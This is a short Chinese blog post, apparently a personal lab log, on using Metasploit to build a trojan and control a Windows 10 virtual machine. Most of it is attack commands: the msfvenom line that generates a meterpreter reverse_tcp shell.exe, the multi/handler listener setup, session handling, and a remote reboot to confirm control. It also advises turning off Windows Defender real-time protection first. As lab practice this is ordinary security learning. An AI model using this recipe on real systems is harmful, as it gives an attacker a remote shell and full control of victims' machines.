记一次metasploit生成木马并控制虚拟机

环境

  • windows10
  • Mac终端

准备

关闭windows10的防火墙,特别是实时防护这一项,不然无法成功,win7没做测试应该可以直接成功

通过metasploit生成木马并控制需要用到以下几个命令:

  • msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.4 lport=4444 -f exe -o /Users/xingwangmingzhe/Downloads/shell.exe这个命令生成木马。这里使用了一个windows/meterpreter/reverse_tcp的模块
  • use exploit/multi/handler这个模块支持的target比较多很常见万能,用来监听木马的连接与否
  • show options用来查看这个模块那些选项是必填项,带有yes的是必填的
  • set PAYLOAD windows/meterpreter/reverse_tcp和上面的payload保持一致,有的教程没有说这一项,不过我用了测试通过。
  • set LHOST 192.168.1.4192.168.1.4换成你自己的ip地址
  • exploit -j后台攻击获取session,也可以直接exploit不带参数(或者run也行)
  • sessions查看有哪些机器打开了木马成功获取到session
  • sessions -I IDsessions -i 1这里的1就是sessions查看到的ID,然后就进入到了meterpreter模块,这是一个后渗透模块,可以打开连接session的反弹shell
  • reboot输入重启命令测试是否控制到机器,成功重启。
    截屏2020-07-25 下午9.38.27.png
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

友情链接更多精彩内容